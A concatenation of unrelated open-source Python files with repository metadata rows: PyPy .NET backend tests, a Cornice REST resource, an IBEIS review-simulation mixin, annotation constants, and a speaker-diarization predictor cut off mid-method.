def test_mix_None_and_instance(self):
def g(x):
return x
def fn(flag):
if flag:
x = None
else:
x = box(42)
return g(x)
res = self.interpret(fn, [1])
assert res is None
def test_box_unbox_instance(self):
class Foo:
pass
def fn():
obj = Foo()
b_obj = box(obj)
obj2 = unbox(b_obj, Foo)
return obj is obj2
res = self.interpret(fn, [])
assert res is True
def test_unbox_instance_fail(self):
class Foo:
pass
def fn():
b_obj = box(42)
return unbox(b_obj, Foo)
res = self.interpret(fn, [])
assert res is None
def test_box_unbox_ooinstance(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
def fn(flag):
a = ootype.new(A)
a.xx = 42
b_obj = box(a)
a2 = unbox(b_obj, A)
return a2.xx
res = self.interpret(fn, [True])
assert res == 42
def test_box_unbox_ooinstance_fail(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
def fn(flag):
b_obj = System.Object()
a2 = unbox(b_obj, A)
return a2
res = self.interpret(fn, [True])
assert res is None
def test_box_unbox_oorecord(self):
A = ootype.Record({'xx': ootype.Signed})
def fn(flag):
a = ootype.new(A)
a.xx = 42
b_obj = box(a)
a2 = unbox(b_obj, A)
return a2.xx
res = self.interpret(fn, [True])
assert res == 42
def test_instance_wrapping(self):
class Foo:
pass
def fn():
obj = Foo()
x = ArrayList()
x.Add(box(obj))
obj2 = unbox(x.get_Item(0), Foo)
return obj is obj2
res = self.interpret(fn, [])
assert res is True
def test_compare_string_None(self):
from pypy.rlib.nonconst import NonConstant
def null():
if NonConstant(True):
return None
else:
return ""
def fn():
ttype = System.Type.GetType('Consts, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089')
namespace = ttype.get_Namespace()
if namespace is not None:
return False
else:
return True
res = self.interpret(fn, [], backendopt=False)
assert res is True
def test_delegate(self):
class Foo:
def __init__(self):
self.x = 0
def m(self, sender, args):
self.x = 42
def fn(flag):
f = Foo()
if flag:
f.m(None, None)
delegate = eventhandler(f.m)
delegate.Invoke(None, None)
return f.x
res = self.interpret(fn, [False])
assert res == 42
def test_static_fields(self):
DummyClass = CLR.pypy.test.DummyClass
def fn():
obj = System.Object()
DummyClass.myfield = obj
return DummyClass.myfield is obj
res = self.interpret(fn, [])
assert res
def test_pypylib(self):
def fn():
return CLR.pypy.runtime.Utils.OOString(42, -1)
res = self.interpret(fn, [])
assert self.ll_to_string(res) == '42'
def test_call_delegate(self):
def build_fn():
tInt = typeof(System.Int32)
args = init_array(System.Type, tInt, tInt)
meth = Utils.CreateDynamicMethod("add", tInt, args)
il = meth.GetILGenerator()
il.Emit(OpCodes.Ldarg_0)
il.Emit(OpCodes.Ldarg_1)
il.Emit(OpCodes.Add)
il.Emit(OpCodes.Ret)
myfunc = meth.CreateDelegate(typeof(FUNCTYPE))
return myfunc
def fn():
myfunc = unbox(build_fn(), FUNCTYPE)
return myfunc(30, 12)
res = self.interpret(fn, [])
assert res == 42
def test_bound_delegate(self):
def build_fn():
tObjArray = System.Type.GetType("System.Object[]")
tInt = typeof(System.Int32)
args = init_array(System.Type, tObjArray, tInt, tInt)
meth = Utils.CreateDynamicMethod("add", tInt, args)
il = meth.GetILGenerator()
il.Emit(OpCodes.Ldarg_1)
il.Emit(OpCodes.Ldarg_2)
il.Emit(OpCodes.Add)
il.Emit(OpCodes.Ret)
array = new_array(System.Object, 0)
myfunc = meth.CreateDelegate(typeof(FUNCTYPE), array)
return myfunc
def fn():
myfunc = unbox(build_fn(), FUNCTYPE)
return myfunc(30, 12)
res = self.interpret(fn, [])
assert res == 42
def test_valuetype_field(self):
class Foo:
def __init__(self, x):
self.x = x
def fn():
f = Foo(OpCodes.Add)
return f
self.interpret(fn, [])
def test_fieldinfo_for_const(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
const = ootype.new(A)
const.xx = 42
def fn():
fieldinfo = fieldinfo_for_const(const)
obj = fieldinfo.GetValue(None)
# get the 'xx' field by using reflection
t = obj.GetType()
x_info = t.GetField('xx')
x_value = x_info.GetValue(obj)
return unbox(x_value, ootype.Signed)
res = self.interpret(fn, [])
assert res == 42
def test_fieldinfo_for_const_pbc(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
const = ootype.new(A)
fieldinfo = fieldinfo_for_const(const)
def fn():
const.xx = 42
obj = fieldinfo.GetValue(None)
# get the 'xx' field by using reflection
t = obj.GetType()
x_info = t.GetField('xx')
x_value = x_info.GetValue(obj)
return unbox(x_value, ootype.Signed)
res = self.interpret(fn, [])
assert res == 42
def test_classof(self):
int32_class = classof(System.Int32)
def fn():
int32_obj = box(int32_class)
int32_type = clidowncast(int32_obj, System.Type)
return int32_type.get_Name()
assert self.interpret(fn, []) == 'Int32'
def test_classof_compare(self):
int32_a = classof(System.Int32)
int32_b = classof(System.Int32)
def fn():
return int32_a is int32_b
assert self.interpret(fn, [])
def test_classof_functype(self):
# this test is overridden in TestPythonnet
c = classof(FUNCTYPE)
def fn():
obj = box(c)
t = clidowncast(obj, System.Type)
return t.get_Name()
res = self.interpret(fn, [])
assert res.startswith('StaticMethod__')
def test_mix_classof(self):
a = classof(System.Int32)
b = classof(FUNCTYPE)
def fn(flag):
if flag:
x = a
else:
x = b
return clidowncast(box(x), System.Type).get_Name()
res = self.interpret(fn, [True])
assert res == 'Int32'
class TestPythonnet(TestDotnetRtyping):
    # don't interpret functions; execute them directly through pythonnet
def interpret(self, f, args, backendopt='ignored'):
return f(*args)
def _skip_pythonnet(self, msg):
py.test.skip(msg)
def test_whitout_box(self):
pass # it makes sense only during translation
def test_typeof_functype(self):
def fn():
t = typeof(FUNCTYPE)
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'DelegateType_int__int_2'
def test_classof_functype(self):
        # this is the TestPythonnet override of the base test
c = classof(FUNCTYPE)
def fn():
obj = box(c)
t = clidowncast(obj, System.Type)
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'DelegateType_int__int_2'
def test_fieldinfo_for_const(self):
pass # it makes sense only during translation
def test_fieldinfo_for_const_pbc(self):
pass # it makes sense only during translation
| 31.924779
| 126
| 0.544652
|
6992c115a9faa2fb70414a73636ce6b97a3a5b33
| 21
|
py
|
Python
|
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
from .aotf import *
| 10.5
| 20
| 0.666667
|
9eea9c32ce1aca0ad55172114bb66419781464a3
| 3,509
|
py
|
Python
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 15
|
2015-03-26T17:28:03.000Z
|
2020-11-18T18:25:00.000Z
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 7
|
2015-03-26T02:07:59.000Z
|
2015-04-14T21:08:12.000Z
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 6
|
2015-03-26T17:27:21.000Z
|
2017-11-16T18:24:44.000Z
|
# -*- coding: utf-8 -*-
from cornice.resource import resource, view
from amhappy.utility.validators import validator_factory
from amhappy.utility.happinstance_db import HappinstanceDB
@resource(collection_path='/happinstances',
path='/happinstances/{application}/{name}',
cors_enabled=True, cors_origins=('*',))
class Happinstance(object):
"""
    A happinstance is an instance of an application that is ready to run. This
    is a REST endpoint.
    It is named for being a Happy Instance.
"""
def __init__(self, request):
"""
Basic init method that also sets up the instance variables for some of
the endpoints
:param request: The pyramid request
:type request: Request
"""
self.request = request
self.happinstancedb = HappinstanceDB(request)
self.name = ''
self.application = ''
self.project = None
self.config = ''
def collection_get(self):
"""
Get the current happinstances, running or not
:return: Dictionary of the happinstances
:rtype: dict
"""
        # return the happinstance storage wrapped in a dict
return {'happinstances': self.happinstancedb}
@view(renderer='json', validators=validator_factory('exists'))
def get(self):
"""
Get the detail for a particular happinstance
"""
self._get_valid_objects()
return self.happinstancedb[self.application].get(self.name)
@view(renderer='json', validators=[validator_factory('unique'),
validator_factory('valid_config')])
def post(self):
"""
        Take a unique and valid config, create a new happinstance, and start
        it up. A POST endpoint.
"""
self._get_valid_objects()
# a happinstance is defined by its config and status and keyed on its
# name
happinstance = {'_id': self.name,
'config': self.config, 'status': 'on'}
self.project.up()
self.happinstancedb[self.application].save(happinstance)
return {'status': 'ok'}
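    # Illustrative request against this endpoint (host, application name and
    # payload are hypothetical):
    #
    #   curl -X POST http://localhost:6543/happinstances/myapp/web \
    #        --data '{"config": "..."}'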
@view(renderer='json', validators=validator_factory('exists'))
def delete(self):
"""
If the happinstance exists, stop it and remove the containers and the
entry in the db.
"""
self._get_valid_objects()
self.project.stop()
self.project.remove_stopped()
del self.happinstancedb[self.application][self.name]
@view(renderer='json', validators=[validator_factory('exists'),
validator_factory('valid_action')])
def put(self):
"""
        Take a validated action and either start or stop a happinstance.
"""
self._get_valid_objects()
action = self.request.validated['action']
happinstance = self.happinstancedb[self.application].get(self.name)
if action == 'on':
self.project.start()
else:
self.project.stop()
happinstance['status'] = action
self.happinstancedb[self.application].save(happinstance)
def _get_valid_objects(self):
"""
Pull the validated values and put them into instance vars
"""
self.name = self.request.validated['name']
self.application = self.request.validated['application']
self.project = self.request.validated['project']
self.config = self.request.validated['config']
| 35.09
| 78
| 0.61442
|
1ee2e4fad37214e1b107b3f66feb1ba701c300af
| 18,825
|
py
|
Python
|
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
"""
Mixin functionality for experiments, tests, and simulations.
This includes recording measures used to generate plots in JC's thesis.
"""
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import six
import utool as ut
import ubelt as ub
import pandas as pd
import itertools as it
from ibeis.algo.graph import nx_utils as nxu
from ibeis.algo.graph.state import (POSTV, NEGTV, INCMP, UNREV, UNKWN, NULL)
print, rrr, profile = ut.inject2(__name__)
class SimulationHelpers(object):
def init_simulation(infr, oracle_accuracy=1.0, k_redun=2,
enable_autoreview=True, enable_inference=True,
classifiers=None, match_state_thresh=None,
max_outer_loops=None, name=None):
infr.print('INIT SIMULATION', color='yellow')
infr.name = name
infr.simulation_mode = True
infr.verifiers = classifiers
infr.params['inference.enabled'] = enable_inference
infr.params['autoreview.enabled'] = enable_autoreview
infr.params['redun.pos'] = k_redun
infr.params['redun.neg'] = k_redun
# keeps track of edges where the decision != the groundtruth
infr.mistake_edges = set()
infr.queue = ut.PriorityQueue()
infr.oracle = UserOracle(oracle_accuracy, rng=infr.name)
if match_state_thresh is None:
match_state_thresh = {
POSTV: 1.0,
NEGTV: 1.0,
INCMP: 1.0,
}
pb_state_thresh = None
if pb_state_thresh is None:
pb_state_thresh = {
'pb': .5,
'notpb': .9,
}
infr.task_thresh = {
'photobomb_state': pd.Series(pb_state_thresh),
'match_state': pd.Series(match_state_thresh)
}
infr.params['algo.max_outer_loops'] = max_outer_loops
def init_test_mode(infr):
from ibeis.algo.graph import nx_dynamic_graph
infr.print('init_test_mode')
infr.test_mode = True
# infr.edge_truth = {}
infr.metrics_list = []
infr.test_state = {
'n_decision': 0,
'n_algo': 0,
'n_manual': 0,
'n_true_merges': 0,
'n_error_edges': 0,
'confusion': None,
}
infr.test_gt_pos_graph = nx_dynamic_graph.DynConnGraph()
infr.test_gt_pos_graph.add_nodes_from(infr.aids)
infr.nid_to_gt_cc = ut.group_items(infr.aids, infr.orig_name_labels)
infr.node_truth = ut.dzip(infr.aids, infr.orig_name_labels)
# infr.real_n_pcc_mst_edges = sum(
# len(cc) - 1 for cc in infr.nid_to_gt_cc.values())
# ut.cprint('real_n_pcc_mst_edges = %r' % (
# infr.real_n_pcc_mst_edges,), 'red')
infr.metrics_list = []
infr.nid_to_gt_cc = ut.group_items(infr.aids, infr.orig_name_labels)
infr.real_n_pcc_mst_edges = sum(
len(cc) - 1 for cc in infr.nid_to_gt_cc.values())
infr.print('real_n_pcc_mst_edges = %r' % (
infr.real_n_pcc_mst_edges,), color='red')
def measure_error_edges(infr):
for edge, data in infr.edges(data=True):
true_state = data['truth']
pred_state = data.get('evidence_decision', UNREV)
if pred_state != UNREV:
if true_state != pred_state:
error = ut.odict([('real', true_state),
('pred', pred_state)])
yield edge, error
@profile
def measure_metrics(infr):
real_pos_edges = []
n_true_merges = infr.test_state['n_true_merges']
confusion = infr.test_state['confusion']
n_tp = confusion[POSTV][POSTV]
confusion[POSTV]
columns = set(confusion.keys())
reviewd_cols = columns - {UNREV}
non_postv = reviewd_cols - {POSTV}
non_negtv = reviewd_cols - {NEGTV}
n_fn = sum(ut.take(confusion[POSTV], non_postv))
n_fp = sum(ut.take(confusion[NEGTV], non_negtv))
n_error_edges = sum(confusion[r][c] + confusion[c][r] for r, c in
ut.combinations(reviewd_cols, 2))
# assert n_fn + n_fp == n_error_edges
pred_n_pcc_mst_edges = n_true_merges
if 0:
import ubelt as ub
for timer in ub.Timerit(10):
with timer:
# Find undetectable errors
num_undetectable_fn = 0
for nid1, nid2 in infr.neg_redun_metagraph.edges():
cc1 = infr.pos_graph.component(nid1)
cc2 = infr.pos_graph.component(nid2)
neg_edges = nxu.edges_cross(infr.neg_graph, cc1, cc2)
for u, v in neg_edges:
real_nid1 = infr.node_truth[u]
real_nid2 = infr.node_truth[v]
if real_nid1 == real_nid2:
num_undetectable_fn += 1
break
# Find undetectable errors
num_undetectable_fp = 0
for nid in infr.pos_redun_nids:
cc = infr.pos_graph.component(nid)
if not ut.allsame(ut.take(infr.node_truth, cc)):
num_undetectable_fp += 1
print('num_undetectable_fn = %r' % (num_undetectable_fn,))
print('num_undetectable_fp = %r' % (num_undetectable_fp,))
if 0:
n_error_edges2 = 0
n_fn2 = 0
n_fp2 = 0
for edge, data in infr.edges(data=True):
decision = data.get('evidence_decision', UNREV)
true_state = infr.edge_truth[edge]
if true_state == decision and true_state == POSTV:
real_pos_edges.append(edge)
elif decision != UNREV:
if true_state != decision:
n_error_edges2 += 1
if true_state == POSTV:
n_fn2 += 1
elif true_state == NEGTV:
n_fp2 += 1
assert n_error_edges2 == n_error_edges
assert n_tp == len(real_pos_edges)
assert n_fn == n_fn2
assert n_fp == n_fp2
# pred_n_pcc_mst_edges2 = sum(
# len(cc) - 1 for cc in infr.test_gt_pos_graph.connected_components()
# )
if False:
import networkx as nx
# set(infr.test_gt_pos_graph.edges()) == set(real_pos_edges)
pred_n_pcc_mst_edges = 0
for cc in nx.connected_components(nx.Graph(real_pos_edges)):
pred_n_pcc_mst_edges += len(cc) - 1
assert n_true_merges == pred_n_pcc_mst_edges
# Find all annotations involved in a mistake
assert n_error_edges == len(infr.mistake_edges)
direct_mistake_aids = {a for edge in infr.mistake_edges for a in edge}
mistake_nids = set(infr.node_labels(*direct_mistake_aids))
mistake_aids = set(ut.flatten([infr.pos_graph.component(nid)
for nid in mistake_nids]))
pos_acc = pred_n_pcc_mst_edges / infr.real_n_pcc_mst_edges
metrics = {
'n_decision': infr.test_state['n_decision'],
'n_manual': infr.test_state['n_manual'],
'n_algo': infr.test_state['n_algo'],
'phase': infr.loop_phase,
'pos_acc': pos_acc,
'n_merge_total': infr.real_n_pcc_mst_edges,
'n_merge_remain': infr.real_n_pcc_mst_edges - n_true_merges,
'n_true_merges': n_true_merges,
'recovering': infr.is_recovering(),
# 'recovering2': infr.test_state['recovering'],
'merge_remain': 1 - pos_acc,
'n_mistake_aids': len(mistake_aids),
'frac_mistake_aids': len(mistake_aids) / len(infr.aids),
'n_mistake_nids': len(mistake_nids),
'n_errors': n_error_edges,
'n_fn': n_fn,
'n_fp': n_fp,
'refresh_support': len(infr.refresh.manual_decisions),
'pprob_any': infr.refresh.prob_any_remain(),
'mu': infr.refresh._ewma,
'test_action': infr.test_state['test_action'],
'action': infr.test_state.get('action', None),
'user_id': infr.test_state['user_id'],
'pred_decision': infr.test_state['pred_decision'],
'true_decision': infr.test_state['true_decision'],
'n_neg_redun': infr.neg_redun_metagraph.number_of_edges(),
'n_neg_redun1': (infr.neg_metagraph.number_of_edges() -
infr.neg_metagraph.number_of_selfloops()),
}
return metrics
def _print_previous_loop_statistics(infr, count):
        # Print stats about what happened in this loop
history = infr.metrics_list[-count:]
recover_blocks = ut.group_items([
(k, sum(1 for i in g))
for k, g in it.groupby(ut.take_column(history, 'recovering'))
]).get(True, [])
infr.print((
'Recovery mode entered {} times, '
'made {} recovery decisions.').format(
len(recover_blocks), sum(recover_blocks)), color='green')
testaction_hist = ut.dict_hist(ut.take_column(history, 'test_action'))
infr.print(
'Test Action Histogram: {}'.format(
ut.repr4(testaction_hist, si=True)), color='yellow')
if infr.params['inference.enabled']:
action_hist = ut.dict_hist(
ut.emap(frozenset, ut.take_column(history, 'action')))
infr.print(
'Inference Action Histogram: {}'.format(
ub.repr2(action_hist, si=True)), color='yellow')
infr.print(
'Decision Histogram: {}'.format(ut.repr2(ut.dict_hist(
ut.take_column(history, 'pred_decision')
), si=True)), color='yellow')
infr.print(
'User Histogram: {}'.format(ut.repr2(ut.dict_hist(
ut.take_column(history, 'user_id')
), si=True)), color='yellow')
@profile
def _dynamic_test_callback(infr, edge, decision, prev_decision, user_id):
was_gt_pos = infr.test_gt_pos_graph.has_edge(*edge)
# prev_decision = infr.get_edge_attr(edge, 'decision', default=UNREV)
# prev_decision = list(infr.edge_decision_from([edge]))[0]
true_decision = infr.edge_truth[edge]
was_within_pred = infr.pos_graph.are_nodes_connected(*edge)
was_within_gt = infr.test_gt_pos_graph.are_nodes_connected(*edge)
was_reviewed = prev_decision != UNREV
is_within_gt = was_within_gt
was_correct = prev_decision == true_decision
is_correct = true_decision == decision
# print('prev_decision = {!r}'.format(prev_decision))
# print('decision = {!r}'.format(decision))
# print('true_decision = {!r}'.format(true_decision))
test_print = ut.partial(infr.print, level=2)
def test_print(x, **kw):
infr.print('[ACTION] ' + x, level=2, **kw)
# test_print = lambda *a, **kw: None # NOQA
if 0:
num = infr.recover_graph.number_of_components()
old_data = infr.get_nonvisual_edge_data(edge)
# print('old_data = %s' % (ut.repr4(old_data, stritems=True),))
print('n_prev_reviews = %r' % (old_data['num_reviews'],))
print('prev_decision = %r' % (prev_decision,))
print('decision = %r' % (decision,))
print('was_gt_pos = %r' % (was_gt_pos,))
print('was_within_pred = %r' % (was_within_pred,))
print('was_within_gt = %r' % (was_within_gt,))
print('num inconsistent = %r' % (num,))
# is_recovering = infr.is_recovering()
if decision == POSTV:
if is_correct:
if not was_gt_pos:
infr.test_gt_pos_graph.add_edge(*edge)
elif was_gt_pos:
test_print("UNDID GOOD POSITIVE EDGE", color='darkred')
infr.test_gt_pos_graph.remove_edge(*edge)
is_within_gt = infr.test_gt_pos_graph.are_nodes_connected(*edge)
split_gt = is_within_gt != was_within_gt
if split_gt:
test_print("SPLIT A GOOD MERGE", color='darkred')
infr.test_state['n_true_merges'] -= 1
confusion = infr.test_state['confusion']
if confusion is None:
# initialize dynamic confusion matrix
# import pandas as pd
states = (POSTV, NEGTV, INCMP, UNREV, UNKWN)
confusion = {r: {c: 0 for c in states} for r in states}
# pandas takes a really long time doing this
# confusion = pd.DataFrame(columns=states, index=states)
# confusion[:] = 0
# confusion.index.name = 'real'
# confusion.columns.name = 'pred'
infr.test_state['confusion'] = confusion
if was_reviewed:
confusion[true_decision][prev_decision] -= 1
confusion[true_decision][decision] += 1
else:
confusion[true_decision][decision] += 1
test_action = None
action_color = None
if is_correct:
# CORRECT DECISION
if was_reviewed:
if prev_decision == decision:
test_action = 'correct duplicate'
action_color = 'darkyellow'
else:
infr.mistake_edges.remove(edge)
test_action = 'correction'
action_color = 'darkgreen'
if decision == POSTV:
if not was_within_gt:
test_action = 'correction redid merge'
action_color = 'darkgreen'
infr.test_state['n_true_merges'] += 1
else:
if decision == POSTV:
if not was_within_gt:
test_action = 'correct merge'
action_color = 'darkgreen'
infr.test_state['n_true_merges'] += 1
else:
test_action = 'correct redundant positive'
action_color = 'darkblue'
else:
if decision == NEGTV:
test_action = 'correct negative'
action_color = 'teal'
else:
test_action = 'correct uninferrable'
action_color = 'teal'
else:
action_color = 'darkred'
# INCORRECT DECISION
infr.mistake_edges.add(edge)
if was_reviewed:
if prev_decision == decision:
test_action = 'incorrect duplicate'
elif was_correct:
test_action = 'incorrect undid good edge'
else:
if decision == POSTV:
if was_within_pred:
test_action = 'incorrect redundant merge'
else:
test_action = 'incorrect new merge'
else:
test_action = 'incorrect new mistake'
infr.test_state['test_action'] = test_action
infr.test_state['pred_decision'] = decision
infr.test_state['true_decision'] = true_decision
infr.test_state['user_id'] = user_id
infr.test_state['recovering'] = (infr.recover_graph.has_node(edge[0]) or
infr.recover_graph.has_node(edge[1]))
infr.test_state['n_decision'] += 1
if user_id.startswith('algo'):
infr.test_state['n_algo'] += 1
elif user_id.startswith('user') or user_id == 'oracle':
infr.test_state['n_manual'] += 1
else:
raise AssertionError('unknown user_id=%r' % (user_id,))
test_print(test_action, color=action_color)
assert test_action is not None, 'what happened?'
class UserOracle(object):
def __init__(oracle, accuracy, rng):
if isinstance(rng, six.string_types):
rng = sum(map(ord, rng))
rng = ut.ensure_rng(rng, impl='python')
if isinstance(accuracy, tuple):
oracle.normal_accuracy = accuracy[0]
oracle.recover_accuracy = accuracy[1]
else:
oracle.normal_accuracy = accuracy
oracle.recover_accuracy = accuracy
# .5
oracle.rng = rng
oracle.states = {POSTV, NEGTV, INCMP}
def review(oracle, edge, truth, infr, accuracy=None):
feedback = {
'user_id': 'user:oracle',
'confidence': 'absolutely_sure',
'evidence_decision': None,
'meta_decision': NULL,
'timestamp_s1': ut.get_timestamp('int', isutc=True),
'timestamp_c1': ut.get_timestamp('int', isutc=True),
'timestamp_c2': ut.get_timestamp('int', isutc=True),
'tags': [],
}
is_recovering = infr.is_recovering()
if accuracy is None:
if is_recovering:
accuracy = oracle.recover_accuracy
else:
accuracy = oracle.normal_accuracy
        # The oracle answers correctly whenever the hardness is less than its
        # accuracy
hardness = oracle.rng.random()
error = accuracy < hardness
if error:
error_options = list(oracle.states - {truth} - {INCMP})
observed = oracle.rng.choice(list(error_options))
else:
observed = truth
if accuracy < 1.0:
feedback['confidence'] = 'pretty_sure'
if accuracy < .5:
feedback['confidence'] = 'guessing'
feedback['evidence_decision'] = observed
if error:
infr.print(
'ORACLE ERROR real={} pred={} acc={:.2f} hard={:.2f}'.format(
truth, observed, accuracy, hardness), 2, color='red')
# infr.print(
# 'ORACLE ERROR edge={}, truth={}, pred={}, rec={}, hardness={:.3f}'.format(edge, truth, observed, is_recovering, hardness),
# 2, color='red')
return feedback
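# Sketch of the oracle's error model (illustrative): each review draws
# hardness ~ U(0, 1) and the oracle errs iff hardness exceeds its accuracy,
# so e.g.
#
#     oracle = UserOracle(0.9, rng='demo')   # wrong on roughly 10% of reviews
#
# and errors are drawn from {POSTV, NEGTV} minus the truth (INCMP is never
# reported in error).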
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis.algo.graph.mixin_simulation
python -m ibeis.algo.graph.mixin_simulation --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| 40.224359
| 140
| 0.554475
|
69adbc05924f4ab3e8b2f53fd3e429a93e6296b3
| 1,124
|
py
|
Python
|
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
constants.py
|
MarcoFavorito/information-extraction-from-annotated-wikipedia
|
749f59c001d3850896431aaf0854c4c2ed209f1e
|
[
"MIT"
] | null | null | null |
# Some constants
NULL_BABELNET_ID = "NULL_BID"
NULL_TYPE = "NULL_T"
CUSTOM_TYPE = "CUSTOM_TYPE"
# XML tags
DISAMBIGUATED_ARTICLE_TAG = "disambiguatedArticle"
TEXT_TAG = "text"
ANNOTATIONS_TAG = "annotations"
ANNOTATION_TAG = "annotation"
BABELNET_ID_TAG = "babelNetID"
MENTION_TAG = "mention"
ANCHOR_START_TAG = "anchorStart"
ANCHOR_END_TAG = "anchorEnd"
TYPE_TAG = "type"
TEXT_TAG_IDX = 0
ANNOTATIONS_TAG_IDX = 1
ANNOTATION_TYPE_MSC = "MSC"
ANNOTATION_TYPE_HL = "HL"
ANNOTATION_TYPE_BABELFY = "BABELFY"
ANNOTATION_BABELNETID_TAG_POS = 0
ANNOTATION_MENTION_POS = 1
ANNOTATION_ANCHORSTART_POS = 2
ANNOTATION_ANCHOREND_POS = 3
ANNOTATION_TYPE_TAG_POS = 4
# POS tags
VERB_POSTAG = "VERB"
PROPN_POSTAG = "PROPN"
PRON_POSTAG = "PRON"
NOUN_POSTAG = "NOUN"
# dep tags
NSUBJ_DEPTAG = "nsubj"
NSUBJPASS_DEPTAG = "nsubjpass"
POBJ_DEPTAG = "pobj"
COBJ_DEPTAG = "cobj"
DOBJ_DEPTAG = "dobj"
ATTR_DEPTAG = "attr"
SPECIAL_DEP_TAGS = [NSUBJ_DEPTAG, NSUBJPASS_DEPTAG, POBJ_DEPTAG, ATTR_DEPTAG, COBJ_DEPTAG, DOBJ_DEPTAG]
SUBJ_DEPTAGS = [NSUBJ_DEPTAG, NSUBJPASS_DEPTAG]
OBJ_DEPTAGS = [POBJ_DEPTAG, ATTR_DEPTAG, COBJ_DEPTAG, DOBJ_DEPTAG]
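# Illustrative usage sketch (not part of the original module); `doc` is a
# hypothetical spaCy Doc whose tokens expose .dep_:
#
#     subjects = [tok for tok in doc if tok.dep_ in SUBJ_DEPTAGS]
#     objects = [tok for tok in doc if tok.dep_ in OBJ_DEPTAGS]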
| 22.938776
| 103
| 0.790036
|
cf3b426b68a61051ec225c59924c4e923b57a33b
| 4,012
|
py
|
Python
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 10
|
2020-03-24T10:34:15.000Z
|
2021-09-02T15:00:55.000Z
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 6
|
2020-08-28T20:22:41.000Z
|
2021-06-25T10:42:02.000Z
|
src/predict.py
|
WiraDKP/pytorch_speaker_embedding_for_diarization
|
61da1b7fe61111355f9329c7c0db20b2ecd0a411
|
[
"MIT"
] | 5
|
2020-04-23T09:46:28.000Z
|
2022-03-25T09:56:24.000Z
|
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
from torch import onnx
from src.model import Encoder
from src.dataset import BaseLoad
from src.utils import zcr_vad, get_timestamp
from src.cluster import OptimizedAgglomerativeClustering
from openvino.inference_engine import IECore, IENetwork
class BasePredictor(BaseLoad):
def __init__(self, config_path, max_frame, hop):
config = torch.load(config_path)
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
super().__init__(config.sr, config.n_mfcc)
self.ndim = config.ndim
self.max_frame = max_frame
self.hop = hop
@staticmethod
def _plot_diarization(y, spans, speakers):
c = y[0].cpu().numpy().copy()
for (start, end), speaker in zip(spans, speakers):
c[start:end] = speaker
plt.figure(figsize=(15, 2))
plt.plot(y[0], "k-")
for idx, speaker in enumerate(set(speakers)):
plt.fill_between(range(len(c)), -1, 1, where=(c==speaker), alpha=0.5, label=f"speaker_{speaker}")
plt.legend(loc="upper center", ncol=idx+1, bbox_to_anchor=(0.5, -0.25))
class PyTorchPredictor(BasePredictor):
def __init__(self, config_path, model_path, max_frame=45, hop=3):
super().__init__(config_path, max_frame, hop)
weight = torch.load(model_path, map_location="cpu")
self.model = Encoder(self.ndim).to(self.device)
self.model.load_state_dict(weight)
self.model.eval()
def predict(self, path, plot=False):
y = self._load(path, mfcc=False)
activity = zcr_vad(y)
spans = get_timestamp(activity)
embed = [self._encode_segment(y, span) for span in spans]
embed = torch.cat(embed).cpu().numpy()
speakers = OptimizedAgglomerativeClustering().fit_predict(embed)
if plot:
self._plot_diarization(y, spans, speakers)
timestamp = np.array(spans) / self.sr
return timestamp, speakers
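        # Illustrative usage (paths are hypothetical):
        #
        #     predictor = PyTorchPredictor("model/config.pth", "model/weights.pth")
        #     timestamp, speakers = predictor.predict("audio/meeting.wav", plot=True)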
def _encode_segment(self, y, span):
start, end = span
mfcc = self._mfcc(y[:, start:end]).to(self.device)
mfcc = mfcc.unfold(2, self.max_frame, self.hop).permute(2, 0, 1, 3)
with torch.no_grad():
            embed = self.model(mfcc).mean(0, keepdim=True)  # "keepdim" is torch's canonical kwarg
return embed
def to_onnx(self, outdir="model/openvino"):
os.makedirs(outdir, exist_ok=True)
mfcc = torch.rand(1, 1, self.n_mfcc, self.max_frame).to(self.device)
